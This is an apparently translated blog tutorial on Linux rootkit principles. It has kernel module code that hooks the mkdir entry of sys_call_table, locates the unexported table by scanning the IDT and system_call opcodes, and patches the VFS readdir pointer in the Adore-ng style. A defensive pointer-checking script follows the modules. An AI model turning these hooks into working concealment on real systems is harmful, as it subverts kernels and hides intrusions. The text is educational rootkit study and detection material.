Principles of rootkit

Source: Internet
Author: User

This is an article about rootkits that can be found all over the Internet. With a critical attitude, I re-read things I had learned N years ago; there are still some things worth learning from it.

Because getdents64() is a system call, intervening in it can only be done in the kernel, through a driver, which on Linux means an LKM. There are currently two ways to "intervene".

1. Hooking the getdents64 entry of the system call table
First look at the code:

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>
MODULE_LICENSE("GPL");
/* sys_call_table is exported (2.4-era kernels), so we can access it directly.
   On some systems this declaration will cause problems. */
extern void *sys_call_table[];
int (*orig_mkdir)(const char *path); /* the original system call */
int hacked_mkdir(const char *path)
{
    return 0; /* everything looks OK, but the new system call does nothing */
}
int init_module(void) /* module setup */
{
    orig_mkdir = sys_call_table[SYS_mkdir];   /* save the original entry */
    sys_call_table[SYS_mkdir] = hacked_mkdir; /* replace it with ours */
    return 0;
}
void cleanup_module(void) /* module shutdown */
{
    sys_call_table[SYS_mkdir] = orig_mkdir;
    /* set the mkdir syscall back to the original one */
}

The above code shows the process!!! I don't remember where I found it. There is a precondition for hooking system calls this way: the kernel must export the sys_call_table symbol, but since 2.6 sys_call_table is no longer exported. That is, the address of the system call table can no longer be obtained in a module through a simple extern void *sys_call_table[];. Fortunately, even if the kernel does not export sys_call_table, its address can still be found in memory. The following is the implementation:


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <asm/unistd.h>
MODULE_LICENSE("GPL");

unsigned long *sys_call_table = NULL;
asmlinkage int (*orig_mkdir)(const char *, int);
/* layout of one 8-byte i386 interrupt gate descriptor */
struct _idt
{
    unsigned short offset_low, segment_sel;
    unsigned char reserved, flags;
    unsigned short offset_high;
};
unsigned long *getscTable(void)
{
    unsigned char idtr[6], *shell, *sort, *p;
    struct _idt *idt;
    unsigned long system_call, sct;
    unsigned short offset_low, offset_high;
    int i;
    /* get the interrupt descriptor table (sidt stores limit:base into idtr[6]) */
    __asm__("sidt %0" : "=m"(idtr));
    /* get the address of system_call: descriptor number 0x80, 8 bytes each */
    idt = (struct _idt *)(*(unsigned long *)&idtr[2] + 8 * 0x80);
    offset_low = idt->offset_low;
    offset_high = idt->offset_high;
    system_call = (offset_high << 16) | offset_low;
    shell = (unsigned char *)system_call;
    /* opcode bytes of "call *sys_call_table(,%eax,4)"; the 32-bit table address follows */
    sort = (unsigned char *)"\xff\x14\x85";
    /* get the address of sys_call_table by scanning the first 100 bytes of system_call */
    for (i = 0; i < (100 - 2); i++)
        if (shell[i] == sort[0] && shell[i + 1] == sort[1] && shell[i + 2] == sort[2])
            break;
    p = &shell[i];
    p += 3; /* skip the three opcode bytes */
    sct = *(unsigned long *)p;
    return (unsigned long *)(sct);
}
asmlinkage int hacked_mkdir(const char *pathname, int mode)
{
    printk("PID %d called sys_mkdir!\n", current->pid);
    return orig_mkdir(pathname, mode);
}
static int __init find_init(void)
{
    sys_call_table = getscTable();
    orig_mkdir = (int (*)(const char *, int))sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir] = (unsigned long)hacked_mkdir;
    return 0;
}
static void __exit find_cleanup(void)
{
    sys_call_table[__NR_mkdir] = (unsigned long)orig_mkdir;
}
module_init(find_init);
module_exit(find_cleanup);

getscTable() is the function that locates the sys_call_table address in memory. Every system call enters the kernel through the int 0x80 interrupt. The Interrupt Descriptor Table maps interrupt vectors to their interrupt service routines; for system calls, the operating system invokes the system_call interrupt service routine. system_call then finds and calls the corresponding service routine in the system call table, indexed by the system call number. The idtr register holds the start address of the Interrupt Descriptor Table, and the instruction __asm__("sidt %0" : "=m"(idtr)) reads it; from that pointer the descriptor of the int 0x80 handler can be located and the address of the system_call function calculated. Disassembling system_call shows that, inside it, the system call function is invoked with call *sys_call_table(,%eax,4).
Therefore, one only needs to find the machine code of that call *sys_call_table(,%eax,4) instruction (the bytes ff 14 85 followed by the 32-bit table address) inside system_call to obtain the entry address of the system call table.
This method of hooking the system call table was popular among Linux rootkits for a while, but it has since become a thing of the past, because anti-rootkit software checks the system call table (comparing it against a backup of the clean system call table) and can thereby find the resident rootkit. You can check with rkhunter and chkrootkit!!!


2. The Adore-ng rootkit provides a new method. Simply put, the system call is intercepted by modifying the function jump table of the VFS file system; this method does not touch the system call table at all.
Hiding files by modifying the relevant function pointers in the VFS (Virtual File Switch) is a relatively new method and a headache for anti-rootkit software. The so-called VFS is the file system model that Linux abstracts over the actual file systems; each concrete file system, such as ext3 or vfat, is a subclass of the abstract class VFS. I don't know much about this either. In the next article, I will analyze the Adore-ng source code.
The implementation is as follows:
#include <linux/sched.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/file.h>
MODULE_LICENSE("GPL");
char *root_fs = "/";
typedef int (*readdir_t)(struct file *, void *, filldir_t);
readdir_t orig_root_readdir = NULL;
/* replacement readdir: logs, then forwards to the file system's own readdir */
int myreaddir(struct file *fp, void *buf, filldir_t filldir)
{
    int r;
    printk("<1>You got me partner!\n");
    r = orig_root_readdir(fp, buf, filldir);
    return r;
}
/* open path p, save the current f_op->readdir and replace it with new_readdir */
int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
    struct file *filep;
    filep = filp_open(p, O_RDONLY, 0);
    if (IS_ERR(filep))
        return -1;
    if (orig_readdir)
        *orig_readdir = filep->f_op->readdir;
    filep->f_op->readdir = new_readdir;
    filp_close(filep, 0);
    return 0;
}
/* restore the original readdir pointer saved by patch_vfs */
int unpatch_vfs(const char *p, readdir_t orig_readdir)
{
    struct file *filep;
    filep = filp_open(p, O_RDONLY, 0);
    if (IS_ERR(filep))
        return -1;
    filep->f_op->readdir = orig_readdir;
    filp_close(filep, 0);
    return 0;
}
static int patch_init(void)
{
    patch_vfs(root_fs, &orig_root_readdir, myreaddir);
    printk("<1>VFS is patched!\n");
    return 0;
}
static void patch_cleanup(void)
{
    unpatch_vfs(root_fs, orig_root_readdir);
    printk("<1>VFS is unpatched!\n");
}
module_init(patch_init);
module_exit(patch_cleanup);
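As an added defender-side example (not code from the article or from Adore-ng), here is the check the article credits anti-rootkit tools with: comparing live kernel function pointers against a clean baseline, carried out offline in Python. It assumes a kernel-side collector has already dumped the syscall table entries and the root directory's f_op->readdir, and it adds a second test that catches both hooking methods on this page: a pointer landing outside the kernel's own text segment (between the _stext and _etext symbols) points into LKM memory. The System.map lines and all addresses below are constructed.

```python
import re

# Constructed System.map excerpt (i386-style addresses, invented for this example).
SYSTEM_MAP = """\
c0100000 T _stext
c0105dc0 T sys_mkdir
c0140a10 T sys_getdents64
c0171f30 T ext3_readdir
c0260000 R sys_call_table
c02a0000 T _etext
"""

def parse_system_map(text):
    """Return symbol name -> address from System.map-formatted lines."""
    syms = {}
    for line in text.splitlines():
        m = re.match(r"^([0-9a-fA-F]+)\s+\S\s+(\S+)", line)
        if m:
            syms[m.group(2)] = int(m.group(1), 16)
    return syms

def kernel_text_range(syms):
    """Kernel code lives in [_stext, _etext); LKM code is mapped elsewhere."""
    return syms["_stext"], syms["_etext"]

def check_pointers(baseline, current, text_range):
    """Flag pointers that differ from the clean baseline or lie outside kernel text."""
    lo, hi = text_range
    findings = []
    for name, addr in current.items():
        if name in baseline and addr != baseline[name]:
            findings.append((name, "differs from clean baseline"))
        if not lo <= addr < hi:
            findings.append((name, "outside kernel text (module memory?)"))
    return findings

def demo():
    syms = parse_system_map(SYSTEM_MAP)
    # Clean snapshot: two syscall table entries and the root directory's f_op->readdir.
    baseline = {
        "sys_call_table[__NR_mkdir]": syms["sys_mkdir"],
        "sys_call_table[__NR_getdents64]": syms["sys_getdents64"],
        "root_dir f_op->readdir": syms["ext3_readdir"],
    }
    # Constructed 'current' dump: two pointers now land in module address space.
    current = dict(baseline)
    current["sys_call_table[__NR_mkdir]"] = 0xF8A01040
    current["root_dir f_op->readdir"] = 0xF8A01120
    return check_pointers(baseline, current, kernel_text_range(syms))
```

On a real system the baseline must come from a trusted source (install-time snapshot or the System.map of the running kernel), since a rootkit loaded before the snapshot would be baselined in.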
 
